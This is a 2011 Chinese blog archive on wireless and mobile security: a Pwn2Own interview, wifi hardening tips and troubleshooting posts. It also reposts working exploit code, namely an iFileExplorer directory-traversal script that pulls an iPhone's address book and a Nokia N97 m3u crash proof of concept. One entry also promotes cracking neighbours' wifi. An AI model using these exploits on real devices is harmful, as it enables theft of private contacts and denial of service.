问:此次比较遗憾的是,Windows Mobile和Android平台的攻击者没有来到大赛的现场。之前看到一些报道,Android平台的安全问题会是2011年比较让人担忧的,你觉得是这样吗?为什么Android的安全问题开始浮出水面?

答:我们都知道,绝对的安全是不存在的,所以Android的问题肯定是有的,比如去年底国外一些黑客组织就陆续发布了针对Android2.0/2.1的多个0Day攻击漏洞,可以导致用户的智能手机远程执行恶意代码、资源耗尽导致死机等。其实无论任何操作系统,安全问题都是存在的,只是其流行程度和关注程度还远没有达到临界点罢了。这个临界点就是由手机的用户数量、流行程度所决定的。这个道理就如同我们刚才提到的Windows一样。

问:您觉得此次pwn2own黑客大赛的亮点是什么?这样的比赛,它的意义在哪里?

答:亮点就是手机厂商与安全人员甚至是黑客的正面对决,这表明了厂商愿意从根本上提高自身安全,愿意对潜在的安全问题负责,愿意为用户负责的态度。相信很多朋友都愿意看到这种让厂商直面自身安全隐患,将其所谓的自信直接放在炉上烤的感觉,这比厂商发布100个公告和声明要有意义的多。这个比赛让我想起了数年前某个防火墙厂商的一个悬赏活动,在单位时间内只要攻破其防火墙设备访问到后方的某一个指定文件,即可获得5万元的奖励。这个Pwn2Own与其性质完全一致,但在这么多主流移动设备供应商的支持下,特别是重赏之下必有勇夫嘛,一些安全研究人员也愿意将自己的技术展现出来,来向很多厂商疏漏的角度展开攻击,这对厂商的提高也是巨大的,所以说,Pwn2Own黑客大赛的深远意义要高出了很多。

问:在智能手机安全领域,我们之前也采访过一些手机安全厂商,目前他们还没有看到大规模的手机木马、病毒的爆发,当前的手机安全软件也大多定位在在隐私保护和软件管理上,您估计手机安全问题到什么阶段可能会大规模爆发?

答:恩,其实主要是因为国内确实没有面临过大规模手机病毒爆发的事件,所以目前国内的手机安全防护类软件主要偏向于隐私保护上,但在国外,早在04年起,自从针对Nokia的Cabir等手机蠕虫病毒的泛滥,使得很多国际上比较有名的产品对手机木马病毒方面的关注度还是很高的,

比如Mcafee、赛门铁克、Kapersky、F-Secure等等。

问:有人认为手机安全问题会随着手机支付的发展而凸现出来,您是怎么看待智能手机平台的黑色产业链和潜在的利润体系的?

  答:显然地,由于国情的不同,对于中国来说,非法软件在手机后台吸费将会是这几年来主要的问题,不过手机自身的安全问题也将受到越来越多的关注,比如现在很多人开始陆续享受到的手机支付等,也将随着普及而出现新的安全问题。而作为黑色产业链这个问题已经不是一两家安全公司、团体或者单纯的手机安防软件能够解决的问题,它需要多个相关部门的联合才能够最大程度地堵住这个黑洞。

++++++

关于浏览器安全的问题,我们来咨询一位在国内知名安全公司工作的技术大拿。对客户端软件安全和Web安全有着很丰富的经验。不过他现在不太方便透露自己的姓名。所以呢,我们这边就不做介绍了。

问:关于Pwn2own2011黑客大赛有几个问题想跟您沟通一下,pwn2own黑客大赛已经结束了,在浏览器的部分, Chrome和Firefox浏览器都没有被攻破,而值得一提的是Chrome浏览器连续3届黑客大赛上都顺利过关,您觉得Chrome的安全性真的是一个神话吗?

答:Chrome的安全系数是比较高的,但是它并不是绝对的安全。为什么chrome的其安全性很高呢?主要有两个方面的原因,一个是谷歌提供了一个有偿的安全谷歌计划,也就是如果有安全人员发现了chrome的安全漏洞,就会有一个有偿的补助,是1000美元到3000美元不等,所以很多安全研究人员发现了chrome的安全漏洞就会上报给谷歌;然后另外一个方面就是,chrome的有一个安全的沙盒,也就是如果chrome有这么一个安全漏洞,但是(黑客利用这个漏洞)并不能直接攻击chrome,也就是说浏览器虽然存在安全漏洞,但是不能被直接攻击。也就是chrome没有被攻破的最主要原因。

问:也就是说攻击者要绕过这个沙盒才能对chrome进行攻击?

答:对。

问:那您刚才说的有偿计划,其他浏览器厂商没有这种机制吗?

答:Firefox也有这种有偿补助,所以这两个浏览器的安全系数高一些,火狐在参加这个大赛之前就已经修复了十多个安全漏洞。

问:所以说它(Firefox)在这次比赛有点侥幸的因素在里边是吧?

答:对

问:第二个问题,作为一名安全研究人员来说,您平常最常用的浏览器是什么?

答:火狐。

问:为什么?

答:因为火狐是一个老牌的插件浏览器,它有很多的插件,可以方便日常的一些工作。

问:那这是从使用功能方面来说的,那其他方面呢?

答:其他方面的话,它最主要的特点就是开源,你可以了解到这个浏览器最近有没有什么安全漏洞,或者可以在开源社区里讨论它的安全漏洞或者防护措施之类的,都可以在第一时间知晓。

问:那我问最后一个问题,和技术有点相关的,就是您能介绍一下常规的浏览器漏洞挖掘技术都有哪些吗?

答:常规的浏览器漏洞挖掘技术的话应该是两块,一块是闭源的,闭源的话主要靠逆向,像(攻击)IE浏览器主要靠逆向,逆向的话是可以直接从源代码分析浏览器的一些漏洞。另外一种是fuzzing也就是模糊测试这种方法,来发现黑盒这种方式测试浏览器的漏洞。

对话IT主持人:

鲜橙、嘉文

文章转载 http://netsecurity.51cto.com/art/201103/249796.htm
类别:Wireless N.T | Tags: , , | 0 条评论, 594 次阅读
Mar
19
2011
Android 2.0 ,2.1, 2.1.1 最新攻击0day代码

有编程基础的看看呗,就当提高!

文章转载:http://bigpack.blogbus.com/logs/109447632.html
类别:Wireless N.T | Tags: , , | 0 条评论, 710 次阅读
Mar
19
2011
2011年的Pwn2Own2011黑客大赛终于落幕,各家的浏览器和手机的安全情况究竟如何呢?一起来听听关于这次大赛的战报。
点击在新窗口中浏览此图片
选手们正在研究中
点击在新窗口中浏览此图片
Safari和IE被攻破
人物简介:主持人:鲜橙、嘉文
本期参与录制人员:嘉文、鲜橙、李唐、阿川、九鬼様
类别:Wireless N.T | Tags: , , , | 0 条评论, 1033 次阅读
Mar
19
2011
iPod Touch/iPhone iFileExplorer Free Directory Traversal
文章转载 http://bigpack.blogbus.com/logs/108926145.html

# Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal
# Date: 04/03/2011 #UK date format
# Author: theSmallNothing
# Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8
# Version: 2.8
# Tested on: iPod Touch 2G (4.1)

import urllib, sqlite3

base = "http://192.168.0.3/" #Change to iDevice ip
url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address

try:
    urllib.urlretrieve(url,"addressbook.sqlite")
    print "Grabbed Address Book\n"
except:
    print "Could not grab address book..."

conn = sqlite3.connect("addressbook.sqlite")
cursor = conn.cursor()
cmd = "SELECT * FROM ABPerson"
cursor.execute(cmd)
results = cursor.fetchall()
for person in results:
    if person[1] == None:
        continue
    print person[1], person[2]
    
    cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0])
    cursor.execute(cmd)
    vunDataArr = cursor.fetchall()
    for vunData in vunDataArr:
        if vunData[5] != None:
            print "\t"+vunData[5]
类别:Wireless N.T | Tags: , , | 0 条评论, 748 次阅读
Mar
19
2011
Nokia N97 m3u Playlist Crash PoC

转载于http://bigpack.blogbus.com/logs/108925938.html

#!/usr/bin/perl

###
# Title : Nokia N97 (PlayList M3U) Crash PoC
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : hardware
# Impact : Crashs & Reboot (Some Times Rebooted )
# Tested on : Nokia N97 v 22.0.110 ( Type RM-505)
# Target :  N97 Mobile
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Usage : Run the (Gestionn de Fichiers)  And Open The (m3u) File with 'Lect.Audio'
#        ==> The (Gestionn de Fichiers) and ( Lect.Audio) is Blocked And Crashed !!
###
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";          
print "    |===========================================================|\n";
print "    |= [!] Name : Nokia N97 (PlayList M3U) vApp 22.0.11        =|\n";
print "    |= [!] Exploit : Local Crash PoC                           =|\n";
print "    |= [!] Author : KedAns-Dz                                  =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
print "    |===========================================================|\n";
sleep(2);
print "\n";
my $file = "n97.m3u";
my $Header = "#M3U\n"; # Header Format M3U
my $ccq = "\x4d\x75\x73\x69\x63\x5c"; # Stock32Gb:\...\Music\  << you are can change this
my $junk = "\x41" x 100000 ; # Junk
my $nop = "\x90" x 55 ; # !| Nop |! x 55
open($FILE,">$file");
print $FILE $Header.$ccq.$junk.$nop ; # Evil File
close($FILE) ;
print "\n[!] Creating $file file...\n";
print "\n[+] File successfully created!\n";

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

类别:Wireless N.T | Tags: , , | 0 条评论, 745 次阅读
Mar
19
2011
  
  USB无线直接接在电脑的USB接口上,与大功率无线网卡不同,它可以加大功率,属于无线网络接收器。 一种以内置雷凌3070芯片为核心的网卡,连接电脑USB接口,自动搜索附近大面积的无线网络,配合黑客软件解密,强行“共享”无线网络的“无线网卡”,实现免费无线上网。
点击在新窗口中浏览此图片
  无线标准
  目前市面上的无线局域网设备主要支持IEEE 802.11g和IEEE 802.11n两种标准。支持IEEE 802.11g+标准的网卡,最高传输速率是108Mbps;支持IEEE 802.11n标准的网卡,最高传输速率是300Mbps,而支持IEEE 802.11b标准的网卡,最高速率仅有11Mbps;支持IEEE 802.11g标准的网卡,最高速率是54Mbps,这些标准都是向下兼容的,消费者在选购的时候就要留意,不要买错或被JS忽悠。
  接口
  USB无线网卡接口主要分USB 2.0、1.1、1.0三种,现在绝大部分USB接口的无线网卡都已经采用USB2.0接口。USB2.0接口能够提供480Mbps的数据通信带宽,而USB1.0则速度要慢得多。
  发射功率
  只要是无线局域网设备都有一定的发射功率,USB无线网卡的发射功率当然是越高越好,这样它的传输距离就越远,我们在选购的时候尽量选择发射功率较高的无线网卡。特别是带有天线技术的,它能够提高无线网卡信号覆盖范围,让用户可以拥有高效稳定的无线网络。
  产品外形
  USB无线网卡可以分为盒型和U盘型两种外观形式。盒型的USB无线网卡标配带有一条数据延长线,大部份都是天线外露,这些设计是为了方便它放置在桌面;而U盘型的USB无线网卡同样标配数据延长线,它的USB接口可以直接插入电脑的USB接口,由于它的天线都是内置,所以不能够不便调节天线的方向。两者在外形上相比之下,U盘型的无线网卡更小巧方便携带。
类别:Wireless N.T | Tags: , , | 0 条评论, 726 次阅读
Mar
6
2011
九个技巧保护无线网络安全连接  
  无线网络系统如果没有采取适当的安全措施,无论这个无线系统是安装在家中还是办公室里,都可能引发严重的安全问题。事实上,一些针对住宅区提供互联网服务的提供商已经在他们的服务协议中禁止用户和其它非授权人共享联网服务。一个不安全的无线网络可能造成服务丢失或是被利用来对其他网络发起攻击。为了避免类似的一些无线网络安全漏洞,这里我们介绍几种便捷的无线网络安全技巧。
  使用无线加密协议
  无线加密协议(WEP)是无线网络上信息加密的一种标准方法。现在出产的无线路由器几乎都向用户提供加密数据的选择,妥善使用此功能就可以避免自己的银行账户的细节信息(包括口令等)不会被居心叵测的人截获。不过,需要注意,Wi-Fi保护访问技术(WPA和WPA2)要比WEP协议更加强健,因此在保障无线通信安全方面作用更大。
  使用MAC地址过滤
  在正常情况下,无线路由器和访问点都拥有防止未知的无线设备连接到网络的能力。这种功能是通过比较试图连接到路由器的设备MAC地址和路由器所保存设备的MAC地址而实现的。不过,不幸的是,在路由器出厂时这种特性通常是关闭的,因为这需要用户的一些努力才能使其正确工作,否则反而无法连接网络。因此,通过启用这种特性,并且只告诉路由器本单位或家庭中无线设备的MAC地址,我们就可以防止他人盗用自己的互联网连接,从而提升安全性。 但不要完全依赖这条措施,也可以这样说,使用MAC地址过滤并不是对付死心塌地地克隆MAC地址并试图连接到用户无线网络的黑客们的救命良药,但你确实应当采用这项措施来减少网络风险。
  设置安全口令
  为无线的互联网访问设置一个口令至关重要。选择一个强口令有助于无线网络的安全,但不要使用伴随无线路由器的默认口令,也不要使用可从字典上轻易查出的单词或家人的生日等作为口令。在不使用网络时将其关闭如果用户的无线网络并不需要每周的24小时都提供服务,可以通过关闭它而减少被黑客们利用的机会。虽然许多企业并不能离开网络,而且将这条建议付诸实施可能不太现实。但对一个系统安全性的最重大改进措施之一就是直接关闭它。因为没有任何人可以访问一种并不存在或打开的服务。
  监视网络入侵者
  用户应当一直监视网络活动,并保障跟踪其趋势。用户特别是管理员对恶意的黑客活动了解得越多,就越容易找到应对策略。网管员应当收集有关扫描和访问企图的日志,并利用现有的大量统计数字生成工具,以便于将这些日志变为更有用的信息。还要设置日志服务器,使其在发现确实有恶意活动发生时能够向管理员发送警告或电子邮件。笔者认为,了解危险相当于赢得了斗争胜利的一半。
  改变服务集标识符并且禁止SSID广播
  服务集标识符(SSID)是无线接入的身份标识符,用户用它来建立与接入点之间的连接。这个身份标识符是由通信设备制造商设置的,并且每个厂商都用自己的缺省值。例如,3COM的设备都用“101”。因此,知道这些标识符的黑客可以很容易不经过授权就享受你的无线服务。你需要给你的每个无线接入点设置一个唯一并且难以推测的SSID。 如果可能的话,还应该禁止你的SSID向外广播。这样,你的无线网络就不能够通过广播的方式来吸纳更多用户,当然这并不是说你的网络不可用,只是它不会出现在可使用网络的名单中。  
  仅在某些时段允许互联网访问
  现在出产的一些最新无线路由器允许用户将对互联网的访问限制在一天的某些时段。例如,如果你不需要从周一到周五的上午8点到下午6点之间访问互联网,那么干脆打开你的路由器设置来禁用这些时段的访问!
  禁用动态主机配置协议
  这好象是一个奇怪的安全策略,但是对于无线网络,它是有道理的。通过这个策略,你将迫使黑客去破解你的IP地址,子网掩码,和其它必需的TCP/IP参数。因为即使黑客可以使用你的无线接入点,他还必需要知道你的IP地址。
  禁用或修改SNMP设置
  如果你的无线接入点支持SNMP, 那么你需要禁用它或者修改默认的公共和私有的标识符。你如果不这么做的话,黑客将可以利用SNMP获取关于你网络的重要信息。
类别:Wireless N.T | Tags: , , | 0 条评论, 558 次阅读
Mar
6
2011
  无线局域网络是相当便利的数据传输系统,它利用射频的技术取代旧式碍手碍脚的双绞铜线所构成的局域网络,使得无线局域网络能利用简单的存取架构让用户透过它,获得信息更加方便快捷。
  随着无线技术的普及,无线组网逐渐成为趋势,无线网络与有线网络相比有着明显的优势,首先无线网络的每个客户端不必再连接一条条的双绞铜线,其次在网络的维护上WLAN也要比有线局域网方便很多,因此不管是家庭还是中小企业对无线组网的需求越来越强烈。那么在搭建无线局域网时,我们究竟该如何布置,才能让无线局域网高效运行,布置过程中应该注意哪些方面,从而达到提升工作效率的目的呢?下面我们从几点来谈一谈:
点击在新窗口中浏览此图片
  无线局域网最大优点
  众所周知,有线网络的工作稳定性、传输性能都是值得肯定的,但是搭建有线局域网受环境、地理、成本等影响,并且改动不太灵活方便。而无线局域网有着许多不可比拟的优势,没有环境的影响,不受地理因素的限制,减少了布线的高成本需求,更重要的是日后改动十分方便,并且可以任意的扩展数量,不增加成本的支出,为企业和家庭带来最大的方便性。
  无线局域网的组建需注意什么?
  在布置无线局域网网络时,我们往往需要仔细考虑许多细节因素,才能保证搭建成功的无线局域网具有很高的工作性能:
  一,在企图通过无线局域网连接远程局域网时,远程局域网所在的建筑物应该尽量保持明确的视线,如果无线局域网要穿过高大的建筑物或茂密的树木等障碍物时,那么搭建成功的无线局域网传输性能就不会十分完美,毕竟那些障碍物会直接影响无线局域网数据信号的正常传输。
  二,当远程网络与本地局域网之间的距离比较远时,我们可以适当降低网络传输带宽的大小,达到远距离数据传输的目的,实在需要进行远距离无线传输的话,我们不妨尝试在中间设立无线局域网中继中转站,以便让上网信号绕过障碍。在无线局域网上网信号进行近距离传输时,为了确保能够获取最大的传输带宽,那样一来就能将几个无线网桥互相集成在一起,同时无线局域网的天线高度基本不会受到影响。
  三,无线局域网的天线高度进行合适设置也是非常重要的,倘若我们没有将无线局域网设备的天线高度设置得好,单纯依靠增大天线增益方法或增大功率放大方法,获取的无线传输效果将十分有限。那么我们可以考虑将无线节点设备的天线布置在建筑物的最顶层上,并且尽量利用小型天线以便确保无线电波的相对集中,这样有利于有效避免来自其他无线局域网上网信号的干扰。
  四,尽管无线局域网传输采用了跳频技术,使得上网信号的频率载波很难被检测到,如此一来只有当双方无线设置了相同的网络ID标识号,才能进行无线上网信号的安全传输。如果要进一步保证无线局域网的运行安全性,我们还可以对无线上网信号进行加密。
  灵活选用无线局域网结构在室外搭建无线局域网网络时,我们通常可以有下面几种结构可以选用,例如点对点结构、一点对多点结构、多点对一点结构以及混合结构。不同的搭建结构,适用于不同的工作场合,我们必须依照实际情况进行有针对性选择。
  点对点
  这种无线局域网搭建结构一般用于需要无线连接的两个固定位置之间,这种搭建结构几乎是最常用的一种无线连网方式,使用这种搭建结构架设而成的无线局域网网络,一般能获取较高的无线信号传输速度,并且也利于无线上网信号的远距离传输,受外界传输信号干扰的影响比较小。
  一点对多点
  这种无线局域网搭建结构常用于单位局域网有一个中心点,多个远程工作点的场合下。选用该结构搭建而成的无线局域网往往具有组网成本比较低廉、网络维护简单等优势,同时由于单位局域网中心使用了全向天线,无线上网调试起来相对容易一些。
  多点对一点结构
  这种无线局域网搭建结构其实是多个点对点结构的有效组合,在存在多个远程工作点、一个中心点的局域网网络中经常会使用这种搭建结构,每一个远程工作点在中心点位置处都有各自对应的设备,该搭建结构往往具有性能可靠、传输稳定的优势。
  混合结构
  这种无线局域网搭建结构几乎适用于局域网中所有的远距离工作站点、近距离工作点,甚至还适用于有障碍物阻挡的那些工作点,在搭建相对复杂的无线局域网网络时,我们就可以尝试使用点对点结构、一点对多点结构、多点对一点结构这几种类型混合在一起的网络连接方式,例如在布置远距离工作点时可以考虑使用点对点连接方式,布置近距离的工作站点时可以采用一点对多点的连接方式,布置有障碍物阻挡的工作点时可以采用中继连接方式。
  总结
  无线局域网在搭建网络时,往往会选用信号比较强的无线设备,事实上,这种方法是不正确的。无线设备的信号能力越强,无线访问的灵敏度就越高,无线上网信号在传输时的穿透能力就会越强。不过,要是无线设备的信号太强的话,无线局域网的有效信号覆盖范围很大,可是实际可控的区域范围恰恰变小了,无线局域网的上网安全性反而会受到明显影响。
类别:Wireless N.T | Tags: , , | 0 条评论, 722 次阅读
Mar
6
2011
在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA来实现对Internet的接入。但是,安全专家认为,随着雇员们经常在无线热点登录,他们将会在不知不觉中将个人及企业的数据暴露出去。虽然目前这种危险还没有兴风作浪,但是由于越来越多的单位依赖于笔记本电脑、PDA设备、智能电话,无线灾难的降临也是迟早的事。

其实,IT可以采取一些措施,保护用户在免受无线热点的危险。例如:

1、对于那些试图访问公司网络的设备而言,企业应当建立并强化强健的认证策略。

2、在雇员进行连接并交换数据时,要求雇员使用公司的VPN。此外,还要设置雇员的计算机,使其自动连接到VPN,并对数据加密。

3、确保所有的设备和软件都配置正确,并安装最新的补丁。

4、确保公司的安全策略防止员工将敏感数据传输到移动设备或未授权的计算机。

5、不使用热点的无线连接,而是使用无线网卡。

在无线热点发生的数据泄露难以发现,且这种数据往往是通过电子邮件进出这些所谓热点的。所以,对于从事商业的人来说,理解保护自己的责任是非常重要的。

多数雇员并不知道

虽然许多技术人员明白这些漏洞的风险,但安全人员认为普通员工并没有得到明确的通知,这会使得许多珍贵的数据易受攻击。

这种困难不太容易克服,因为用户们需要移动性。他们希望使用任何移动设备在无线热点访问电子表软件或幻灯片。但是,仅仅一台有漏洞的或配置错误的笔记本电脑就足以使整个公司名誉扫地。

其实,并不是某种特定设备导致问题,而是多种因素的组合使得数据保护成为无线热点的重要问题。

问题之一就是热点自身,无线连接甚至有线互联网连接都可成为危险区域。危险在于公共访问点。风险在于管理员无法控制的网络上。在用户位于公共网络上时,就像没有保护上网一样。此时,你并不知道你的邻居是谁。

不加密的信息在流经这些公共的网络时,那些别有用心的人就可以看到。笔记本电脑、智能电话和PDA等可以与位于公共热点上的其它人通信,甚至在用户并不强求这样做时,也能与对方聊天。

记住,在你与他人共享网络的任何时间,在你的机器与他人彼此共享时,攻击者就可以截获任何人的信息。
类别:Wireless N.T | Tags: , | 0 条评论, 502 次阅读
Feb
13
2011
无法无线上网!这该如何是好呢?不少朋友都会遇到这些问题,那么我们从何切入来解决这个故障呢?不用着急,现在本文就将列出无法无线上网的具体排除的过程,希望对大家有所帮助。

无线网络不能使用

单位办公室有一台“服役”了几年的笔记本电脑,该电脑内置有无线网卡设备,以前单位领导使用该无线网卡设备可以使用、访问无线网络,可最近不知道什么原因,该无线网卡设备始终无法连接到单位的无线局域网中,无法无线上网。不得已,单位领导只好电话“邀请”笔者迅速赶到故障现场,帮助其解决无线网络不能使用的故障现象。

接到领导的命令,笔者丝毫不敢怠慢,立即三步并成两步地赶到故障现场,并对故障现场进行了按部就班地勘查,发现该笔记本电脑经典的老式IBM T30,其内置的无线网卡设备传输速度达到了11M;为了查看该无线网卡设备的工作状态是否正常,笔者依次单击“开始”/“设置”/“网络连接”命令,在弹出的本地网络连接列表窗口中,找到目标无线网络连接图标,并用鼠标右键单击该连接图标,从弹出的快捷菜单中执行“属性”命令,打开目标无线网络连接的属性设置界面。从该界面中笔者看到无线上网信号不是很强,起初笔者还以为是无线上网受到了外界干扰,特地将笔记本电脑转移到上网信号非常强的位置(也就是测试时信号满格的位置),结果发现笔记本电脑还是不能访问无线网络,看来这台笔记本电脑的确不能访问无线网络了。

检查无线路由设置

既然笔记本电脑已经能够探测到无线上网信号,那为什么还无法无线上网呢?那它为什么不能从局域网中的无线路由器那里获得IP地址呢?会不会是无线路由器设置了访问加密的缘故呢?想到这一点,笔者立即以系统管理员身份远程登录进无线路由器的后台管理界面,从中找到无线加密的设置选项,取消了无线加密的功能设置,结果还是不行。难道是无线路由器内置的DHCP服务功能出现了意外,或者干脆没有正常启用?为了检验自己的猜测,笔者从无线路由器的后台管理界面中找到DHCP服务功能选项,仔细查看该选项的数值时,发现DHCP服务处于正常工作状态。这说明笔记本电脑的无线网卡设备不能上网的原因与无线路由器的DHCP服务功能没有任何关系。

在无线路由器的后台管理界面中,笔者偶然发现了该设备自带的防火墙功能、MAC地址过滤功能都处于启用状态,看来单位网络管理员为了防止非法用户偷偷访问无线局域网,对无线路由器设备进行了一些安全限制,会不会是这些安全设置影响了单位领导的笔记本电脑正常访问无线网络呢?为了排除无线上网的一切干扰,笔者打算暂时取消这些安全设置,可是当笔者尝试将无线路由器的防火墙功能、MAC地址过滤功能全部关闭后,发现老式IBM T30笔记本电脑仍然还不能正常访问单位的无线局域网。后来,笔者查找了一下无线路由器设备的操作说明书,发现该设备能够正常支持802.11g、 802.11b等无线通信标准,看来问题不在局域网的无线路由器设备上,而很可能是笔记本电脑自身有问题。

检查本地系统设置

如果本地笔记本电脑有问题,那究竟是哪些因素会影响无线网卡设备正常访问无线网络呢?首先笔者想到的是无线上网设置,因为要是无线网络的SSID名称或其他一些设置不正确时,无线网卡可能就无法准确搜索到局域网中的无线路由器;在检查无线上网设置时,笔者先是按照前面的操作步骤打开目标无线网络连接的设置窗口,单击其中的“无线网络配置”选项卡,打开的选项设置页面,在该设置页面中将“用Windows配置我的无线网络设置”项目选中,同时单击“查看无线网络”按钮,从其后界面中找到目标无线局域网网络,然后单击“属性”按钮,进入具体的无线网络配置对话框,在这里笔者并没有找到可疑的地方,这说明无线上网配置是没有任何问题的。

有没有可能是Windows系统自身设置不当呢?考虑到无线上网时,需要使用无线访问服务、远程调用服务等,要是这些系统服务运行状态不正常时,那么无线上网操作可能就会失败,想到这一点,笔者决定对上面几个系统服务的运行状态进行一下检查。

在进行这项检查操作时,笔者先是依次单击“开始”/“运行”命令,在弹出的系统运行文本框中输入字符串命令“services.msc”,单击“确定”按钮后,打开笔记本电脑系统的服务列表窗口,从中找到可疑的目标系统服务,再用鼠标双击该服务选项,打开如图3所示的服务属性设置窗口,在该设置窗口的“常规”标签页面中,笔者看到无线访问服务、远程调用服务等工作状态都正常,这就意味着无法无线上网的故障现象与笔记本电脑系统的服务状态也无关。在此期间,笔者还顺便检查了Windows系统自带的防火墙参数,以及对Windows系统尝试了文件修复操作,结果发现一切正常,至此,无法无线上网的故障排查工作陷入了僵局。

检查无线网卡设置

在排除了之上无法无线上网各项因素后,笔者开始将怀疑重点转移到笔记本电脑自带的无线网卡设备上了,难道是该无线网卡设备发生了硬件损坏?如果真是那样的话,笔者只有重新更换新的无线网卡设备才能解决问题,但转念一想,平时单位领导不怎么使用无线网卡设备,按理来说该设备发生硬件损坏的可能性还是比较小的,为此笔者打算先从该无线网卡设备的设置着手,来看看该设备是不是出了问题。

于是,笔者立即打开笔记本电脑的设备管理器窗口,从中找到目标无线网卡设备,并用鼠标右键单击该网卡设备,从弹出的快捷菜单中执行“属性”命令,打开目标网卡设备的属性设置界面;当笔者检查到 “高级”标签页面时,偶然发现“802.D Control”选项的数值被设置为了“Strict”,看到这项设置时笔者感到非常奇怪,因为笔者知道,先前无线局域网使用的无线通信标准主要是 802.11b标准,并且工作在2.4G赫兹频段,而目前无线局域网使用的无线通信标准主要是802.11g标准,那么安装在这台老式笔记本电脑中的无线网卡设备怎么会使用802.11d标准呢?

到Internet网络中搜索了相关信息后,笔者发现802.11d无线通信标准主要是针对类似跳频模式、信道化等物理层面定义了一些要求,以便让通信设备满足国家无线电制定的一些特殊管制要求。再返回到老式IBM T30笔记本电脑的无线网卡设置对话框,笔者发现“802.D Control”选项的数值既然为“Strict”,那就表示无线网卡设备在工作的时候必须严格遵守802.11d这一通信标准,而局域网无线路由器设备却只能支持802.11g、802.11b等无线通信标准,看来问题很可能是无线网卡设备的工作标准设置错误了。

弄清楚了无法无线上网的原因后,笔者立即尝试着将目标无线网卡设备的“802.D Control”选项数值重新修改为了“None”或“Flexible”,再单击“确定”按钮保存好上述设置操作,这时再上网访问单位的无线局域网时,发现终于能够正常上网了,至此老式笔记本电脑无法无线上网的故障现象就被彻底地解决了。

最后的小结

一些有着专业用途的笔记本电脑或早期的老式笔记本电脑,其自带的无线网卡设备很容易出现一些无线通信标准与目前局域网无线路由器使用的通信标准不相兼容的现象,这些现象由于平时我们很少碰到,因此具有很强的隐蔽性,我们在解决这类无线网络故障时很容易多走弯路,所以我们日后一定要对无线网卡设备的工作标准多加注意,一旦发现无线通信标准异常时,不妨尝试将其修改成兼容802.11g、802.11b等无线通信标准,相信这样就能解决这些无法无线上网的故障。
类别:Wireless N.T | Tags: , | 0 条评论, 586 次阅读
Feb
1
2011
在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA来实现对Internet的接入。但是,安全专家认为,随着雇员们经常在无线热点登录,他们将会在不知不觉中将个人及企业的数据暴露出去。虽然目前这种危险还没有兴风作浪,但是由于越来越多的单位依赖于笔记本电脑、PDA设备、智能电话,无线灾难的降临也是迟早的事。

其实,IT可以采取一些措施,保护用户在免受无线热点的危险。例如:

1、对于那些试图访问公司网络的设备而言,企业应当建立并强化强健的认证策略。

2、在雇员进行连接并交换数据时,要求雇员使用公司的VPN。此外,还要设置雇员的计算机,使其自动连接到VPN,并对数据加密。

3、确保所有的设备和软件都配置正确,并安装最新的补丁。

4、确保公司的安全策略防止员工将敏感数据传输到移动设备或未授权的计算机。

5、不使用热点的无线连接,而是使用无线网卡。

在无线热点发生的数据泄露难以发现,且这种数据往往是通过电子邮件进出这些所谓热点的。所以,对于从事商业的人来说,理解保护自己的责任是非常重要的。

多数雇员并不知道

虽然许多技术人员明白这些漏洞的风险,但安全人员认为普通员工并没有得到明确的通知,这会使得许多珍贵的数据易受攻击。

这种困难不太容易克服,因为用户们需要移动性。他们希望使用任何移动设备在无线热点访问电子表软件或幻灯片。但是,仅仅一台有漏洞的或配置错误的笔记本电脑就足以使整个公司名誉扫地。

其实,并不是某种特定设备导致问题,而是多种因素的组合使得数据保护成为无线热点的重要问题。

问题之一就是热点自身,无线连接甚至有线互联网连接都可成为危险区域。危险在于公共访问点。风险在于管理员无法控制的网络上。在用户位于公共网络上时,就像没有保护上网一样。此时,你并不知道你的邻居是谁。

不加密的信息在流经这些公共的网络时,那些别有用心的人就可以看到。笔记本电脑、智能电话和PDA等可以与位于公共热点上的其它人通信,甚至在用户并不强求这样做时,也能与对方聊天。

记住,在你与他人共享网络的任何时间,在你的机器与他人彼此共享时,攻击者就可以截获任何人的信息。
类别:Wireless N.T | Tags: , | 0 条评论, 368 次阅读
Jan
25
2011
如今任何人部署和设计无线局域网都应该会使用802.11n无线接入点。这不仅仅是价格可以和11a/g相匹敌,而且由于11n的可及范围使得室内空间需要的无线接入点更少。虽然一些电池供电的设备还没销售出去,但是大部分新客户也还是选择了11n产品。总之,除非是商业需要否则肯定买11n产品。

当你要设计802.11n无线局域网时,最佳实践是难以捉摸的:

◆信道结构:几乎所有的产品都会用多信道来创建微蜂窝,但至少会有两家供应商使用一个单信道来创建一个大的RF层。很明显,当用户移动时后者会减少漫游时间,但权衡取舍仍存在着激烈的争议。

◆分发控制:在集中控制的无线局域网中802.11n显示出了低效和瓶颈。小控制器难于应付高吞吐量,向一个控制器打开所有隧道会导致延时,并且扩展端到端Qos会很难。为得到最佳效果,当分配实时Qos和安全控制任务给AP时需要集中化管理和可见性。

